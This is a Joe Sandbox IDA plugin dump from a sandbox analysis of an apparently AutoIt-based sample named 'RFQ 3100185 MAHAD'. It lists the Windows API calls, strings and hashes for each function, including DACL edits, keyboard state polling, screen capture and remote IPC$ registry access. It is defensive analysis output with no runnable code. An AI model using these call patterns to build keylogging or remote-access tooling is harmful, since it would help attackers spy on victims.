                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                            • String ID: 0
                                                            • API String ID: 1296962147-4108050209
                                                            • Opcode ID: c4ba2c96590a1b00c95ee28ce91ab8b24f05f766af6cfc255158ee9e53c8293c
                                                            • Instruction ID: ddc84a8e6d822afda927d4f996b6cb7a2cba68ebb9ac3eeb4b76d150932cf5f6
                                                            • Opcode Fuzzy Hash: c4ba2c96590a1b00c95ee28ce91ab8b24f05f766af6cfc255158ee9e53c8293c
                                                            • Instruction Fuzzy Hash: 26816B71104301EFDB11CF14D888AAABBE9FF88714F10492EFA99D7292D770D985CB92
                                                            APIs
                                                              • Part of subcall function 007EABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 007EABD7
                                                              • Part of subcall function 007EABBB: GetLastError.KERNEL32(?,007EA69F,?,?,?), ref: 007EABE1
                                                              • Part of subcall function 007EABBB: GetProcessHeap.KERNEL32(00000008,?,?,007EA69F,?,?,?), ref: 007EABF0
                                                              • Part of subcall function 007EABBB: HeapAlloc.KERNEL32(00000000,?,007EA69F,?,?,?), ref: 007EABF7
                                                              • Part of subcall function 007EABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 007EAC0E
                                                              • Part of subcall function 007EAC56: GetProcessHeap.KERNEL32(00000008,007EA6B5,00000000,00000000,?,007EA6B5,?), ref: 007EAC62
                                                              • Part of subcall function 007EAC56: HeapAlloc.KERNEL32(00000000,?,007EA6B5,?), ref: 007EAC69
                                                              • Part of subcall function 007EAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,007EA6B5,?), ref: 007EAC7A
                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 007EA8CB
                                                            • _memset.LIBCMT ref: 007EA8E0
                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 007EA8FF
                                                            • GetLengthSid.ADVAPI32(?), ref: 007EA910
                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 007EA94D
                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 007EA969
                                                            • GetLengthSid.ADVAPI32(?), ref: 007EA986
                                                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 007EA995
                                                            • HeapAlloc.KERNEL32(00000000), ref: 007EA99C
                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 007EA9BD
                                                            • CopySid.ADVAPI32(00000000), ref: 007EA9C4
                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 007EA9F5
                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 007EAA1B
                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 007EAA2F
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                            • String ID:
                                                            • API String ID: 3996160137-0
                                                            • Opcode ID: 6ffc45b82405277e51d464c10c016cfb9ce821bdc94b2ea215b5d5905a63be60
                                                            • Instruction ID: dc3485dc9a6ab4ecd7914e772b0fcf68b2d205fa5ea4a6105dd99a8e0996e348
                                                            • Opcode Fuzzy Hash: 6ffc45b82405277e51d464c10c016cfb9ce821bdc94b2ea215b5d5905a63be60
                                                            • Instruction Fuzzy Hash: EB515DB1901249BFDF04DFA1DD85AEEBB79FF48300F048529F811AB290DB38A905CB61
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 00809E36
                                                            • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00809E42
                                                            • CreateCompatibleDC.GDI32(?), ref: 00809E4E
                                                            • SelectObject.GDI32(00000000,?), ref: 00809E5B
                                                            • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00809EAF
                                                            • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00809EEB
                                                            • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00809F0F
                                                            • SelectObject.GDI32(00000006,?), ref: 00809F17
                                                            • DeleteObject.GDI32(?), ref: 00809F20
                                                            • DeleteDC.GDI32(00000006), ref: 00809F27
                                                            • ReleaseDC.USER32(00000000,?), ref: 00809F32
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                            • String ID: (
                                                            • API String ID: 2598888154-3887548279
                                                            • Opcode ID: 32f21298287c705b46d30c5ac9ffee4caf559d96d830f4851529d3985ac562b3
                                                            • Instruction ID: 044db2d98f904595bff09ad3f0219b08e37cd170309b318f1333d91931dd1e73
                                                            • Opcode Fuzzy Hash: 32f21298287c705b46d30c5ac9ffee4caf559d96d830f4851529d3985ac562b3
                                                            • Instruction Fuzzy Hash: AE513776900309EFCB14CFA8DC85EAEBBB9FF48710F14881DF999A7250D771A9418B90
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: LoadString__swprintf_wprintf
                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                            • API String ID: 2889450990-2391861430
                                                            • Opcode ID: 6d3c75ee374017bb57bae6eb57abf61e92029862e00e896e1501b8101aebc66e
                                                            • Instruction ID: 9684ea3570ddb10ce76308082932160563faa56312b85cd604bc8b24c28bfe34
                                                            • Opcode Fuzzy Hash: 6d3c75ee374017bb57bae6eb57abf61e92029862e00e896e1501b8101aebc66e
                                                            • Instruction Fuzzy Hash: 42516A7190020DFACB16EBA4CE4AFEEB778EF04304F104065F515722A2EB396E59DB61
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: LoadString__swprintf_wprintf
                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                            • API String ID: 2889450990-3420473620
                                                            • Opcode ID: 665b8b13777875e2f5fd96196b95e3691fdd43f0b822a0e0e0e281c6fbf2981d
                                                            • Instruction ID: 95d3309e8cba7f1f60d9cb7628a989f57de8ec3de01691ba1123582e7ea11bd9
                                                            • Opcode Fuzzy Hash: 665b8b13777875e2f5fd96196b95e3691fdd43f0b822a0e0e0e281c6fbf2981d
                                                            • Instruction Fuzzy Hash: 75516D7190060DEADF15EBA4DE4AFEEB778AF04340F104065F605722A2EA386F59DF61
                                                            APIs
                                                            • _memset.LIBCMT ref: 007F55D7
                                                            • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 007F5664
                                                            • GetMenuItemCount.USER32(00871708), ref: 007F56ED
                                                            • DeleteMenu.USER32(00871708,00000005,00000000,000000F5,?,?), ref: 007F577D
                                                            • DeleteMenu.USER32(00871708,00000004,00000000), ref: 007F5785
                                                            • DeleteMenu.USER32(00871708,00000006,00000000), ref: 007F578D
                                                            • DeleteMenu.USER32(00871708,00000003,00000000), ref: 007F5795
                                                            • GetMenuItemCount.USER32(00871708), ref: 007F579D
                                                            • SetMenuItemInfoW.USER32(00871708,00000004,00000000,00000030), ref: 007F57D3
                                                            • GetCursorPos.USER32(?), ref: 007F57DD
                                                            • SetForegroundWindow.USER32(00000000), ref: 007F57E6
                                                            • TrackPopupMenuEx.USER32(00871708,00000000,?,00000000,00000000,00000000), ref: 007F57F9
                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 007F5805
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                            • String ID:
                                                            • API String ID: 3993528054-0
                                                            • Opcode ID: 2a37b569db428de59e5b2faf760b9830f1ee3202b69161edfe9ed7a6524b27c5
                                                            • Instruction ID: 2bb70f5aa57112003dd5a1f325e2c5c30424cabd75b1a9cdcf7fa1408d9af0ce
                                                            • Opcode Fuzzy Hash: 2a37b569db428de59e5b2faf760b9830f1ee3202b69161edfe9ed7a6524b27c5
                                                            • Instruction Fuzzy Hash: 2971C270641A0DBBEB219B54DC89FBABF65FF40768F244205F728AA3D1C7795810DBA0
                                                            APIs
                                                            • _memset.LIBCMT ref: 007EA1DC
                                                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 007EA211
                                                            • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 007EA22D
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 007EA249
                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 007EA273
                                                            • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 007EA29B
                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 007EA2A6
                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 007EA2AB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                            • API String ID: 1687751970-22481851
                                                            • Opcode ID: a960cfdb1417af9b5e8d722665a848a8d7b6dab81496b385bb3c3264dac258df
                                                            • Instruction ID: 6981b54b9ae0ebf247ce1268019f3d532ea6ae7cbb0727b70c151fc1916a8d4c
                                                            • Opcode Fuzzy Hash: a960cfdb1417af9b5e8d722665a848a8d7b6dab81496b385bb3c3264dac258df
                                                            • Instruction Fuzzy Hash: 0D41F776C1162DEACB25EBA4DC99AEDB778FF48710F004469E901B3161EB78AE05CB50
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00812BB5,?,?), ref: 00813C1D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpper
                                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                            • API String ID: 3964851224-909552448
                                                            • Opcode ID: 1eb943b3ad8f15a0e63f93ce3cf9f861a84fde148237ab00c7180d0b7d965e63
                                                            • Instruction ID: faa3794fa198169b6b60ba2b8afc4d7e54e05d0872091e58c8d62d5e64197668
                                                            • Opcode Fuzzy Hash: 1eb943b3ad8f15a0e63f93ce3cf9f861a84fde148237ab00c7180d0b7d965e63
                                                            • Instruction Fuzzy Hash: 1041427010024ACBDF10EF54E856AEF3369FF52340F515458EC569B292EB74AE9ACB60
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,008236F4,00000010,?,Bad directive syntax error,0084DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 007F25D6
                                                            • LoadStringW.USER32(00000000,?,008236F4,00000010), ref: 007F25DD
                                                            • _wprintf.LIBCMT ref: 007F2610
                                                            • __swprintf.LIBCMT ref: 007F2632
                                                            • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 007F26A1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                            • API String ID: 1080873982-4153970271
                                                            • Opcode ID: 04982c0d16dc25988064edc27ee6ac6a5f6038d7b4e88bead5d925622869fcc9
                                                            • Instruction ID: 404176ea32f3a51a06fce12ea72f6808b9a685c44a9999c0666c6015e47bb6d0
                                                            • Opcode Fuzzy Hash: 04982c0d16dc25988064edc27ee6ac6a5f6038d7b4e88bead5d925622869fcc9
                                                            • Instruction Fuzzy Hash: 63214B3190021EFFCF12AB90CC4AFEE7B39FF18304F044455F515A62A2EA79A629DB51
                                                            APIs
                                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 007F7B42
                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 007F7B58
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007F7B69
                                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 007F7B7B
                                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 007F7B8C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: SendString
                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                            • API String ID: 890592661-1007645807
                                                            • Opcode ID: 3c2388d5874b48025c0f719a1b5fa04e9f2edf4f1525fdf0e486e56b8cf0d7b0
                                                            • Instruction ID: 59d68c1ab6a7cb58efbdd4bbb3b98eae1ce58273340624bb8a5c4ee6576016d4
                                                            • Opcode Fuzzy Hash: 3c2388d5874b48025c0f719a1b5fa04e9f2edf4f1525fdf0e486e56b8cf0d7b0
                                                            • Instruction Fuzzy Hash: 7B1182E165025DB9D724B765CC4EEFF7A7CFBD2B10F000429B521A21D1EEA81A45C5A0
                                                            APIs
                                                            • timeGetTime.WINMM ref: 007F7794
                                                              • Part of subcall function 007CDC38: timeGetTime.WINMM(?,75A4B400,008258AB), ref: 007CDC3C
                                                            • Sleep.KERNEL32(0000000A), ref: 007F77C0
                                                            • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 007F77E4
                                                            • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 007F7806
                                                            • SetActiveWindow.USER32 ref: 007F7825
                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 007F7833
                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 007F7852
                                                            • Sleep.KERNEL32(000000FA), ref: 007F785D
                                                            • IsWindow.USER32 ref: 007F7869
                                                            • EndDialog.USER32(00000000), ref: 007F787A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                            • String ID: BUTTON
                                                            • API String ID: 1194449130-3405671355
                                                            • Opcode ID: 8ad1e61746c5224b3073f91402a4489b517b237b30208a5518cab07b0d1f8b87
                                                            • Instruction ID: 26c988da383c598b94b3f7609cef0e4ac8333fee58b5ed0048a18abcc4c947a7
                                                            • Opcode Fuzzy Hash: 8ad1e61746c5224b3073f91402a4489b517b237b30208a5518cab07b0d1f8b87
                                                            • Instruction Fuzzy Hash: 472142B0214309AFE7156B60FC8DB363F6AFB44345F004414F619863B6DB79DD50EA62
                                                            APIs
                                                              • Part of subcall function 007B936C: __swprintf.LIBCMT ref: 007B93AB
                                                              • Part of subcall function 007B936C: __itow.LIBCMT ref: 007B93DF
                                                            • CoInitialize.OLE32(00000000), ref: 0080034B
                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 008003DE
                                                            • SHGetDesktopFolder.SHELL32(?), ref: 008003F2
                                                            • CoCreateInstance.OLE32(0083DA8C,00000000,00000001,00863CF8,?), ref: 0080043E
                                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 008004AD
                                                            • CoTaskMemFree.OLE32(?,?), ref: 00800505
                                                            • _memset.LIBCMT ref: 00800542
                                                            • SHBrowseForFolderW.SHELL32(?), ref: 0080057E
                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 008005A1
                                                            • CoTaskMemFree.OLE32(00000000), ref: 008005A8
                                                            • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 008005DF
                                                            • CoUninitialize.OLE32(00000001,00000000), ref: 008005E1
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                            • String ID:
                                                            • API String ID: 1246142700-0
                                                            • Opcode ID: 48a5adc41509837b98d38e2adf4e1c7dda0e8cecd6b1682028c07e515b5e1471
                                                            • Instruction ID: 309de8b841d9536582293f5bb6cd5baf134adacb548acd6daa6a8b97114651df
                                                            • Opcode Fuzzy Hash: 48a5adc41509837b98d38e2adf4e1c7dda0e8cecd6b1682028c07e515b5e1471
                                                            • Instruction Fuzzy Hash: 2CB1C575A00209AFDB14DFA4C889EAEBBB9FF88304F148469E905EB251DB34ED41CF50
                                                            APIs
                                                            • GetKeyboardState.USER32(?), ref: 007F2ED6
                                                            • SetKeyboardState.USER32(?), ref: 007F2F41
                                                            • GetAsyncKeyState.USER32(000000A0), ref: 007F2F61
                                                            • GetKeyState.USER32(000000A0), ref: 007F2F78
                                                            • GetAsyncKeyState.USER32(000000A1), ref: 007F2FA7
                                                            • GetKeyState.USER32(000000A1), ref: 007F2FB8
                                                            • GetAsyncKeyState.USER32(00000011), ref: 007F2FE4
                                                            • GetKeyState.USER32(00000011), ref: 007F2FF2
                                                            • GetAsyncKeyState.USER32(00000012), ref: 007F301B
                                                            • GetKeyState.USER32(00000012), ref: 007F3029
                                                            • GetAsyncKeyState.USER32(0000005B), ref: 007F3052
                                                            • GetKeyState.USER32(0000005B), ref: 007F3060
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: State$Async$Keyboard
                                                            • String ID:
                                                            • API String ID: 541375521-0
                                                            • Opcode ID: 9177e78f32b2e7b0bd4f298c2d32cc1d8154fcecdb627f1d24fefbb1ad1363fe
                                                            • Instruction ID: d7f5bee0798d750dac957685b6908e1a5205e55c22740176661622269fb4db9a
                                                            • Opcode Fuzzy Hash: 9177e78f32b2e7b0bd4f298c2d32cc1d8154fcecdb627f1d24fefbb1ad1363fe
                                                            • Instruction Fuzzy Hash: 2851C620A0478C69FB35EBA488157FABBF59F11340F08859AD7C2563C3DA5C9B8DC762
                                                            APIs
                                                            • GetDlgItem.USER32(?,00000001), ref: 007EED1E
                                                            • GetWindowRect.USER32(00000000,?), ref: 007EED30
                                                            • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 007EED8E
                                                            • GetDlgItem.USER32(?,00000002), ref: 007EED99
                                                            • GetWindowRect.USER32(00000000,?), ref: 007EEDAB
                                                            • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 007EEE01
                                                            • GetDlgItem.USER32(?,000003E9), ref: 007EEE0F
                                                            • GetWindowRect.USER32(00000000,?), ref: 007EEE20
                                                            • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 007EEE63
                                                            • GetDlgItem.USER32(?,000003EA), ref: 007EEE71
                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 007EEE8E
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 007EEE9B
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                            • String ID:
                                                            • API String ID: 3096461208-0
                                                            • Opcode ID: 1357fb42c355c89b468a164d4eeb5dc70621fb7aa29c3d44b976f33a6b925427
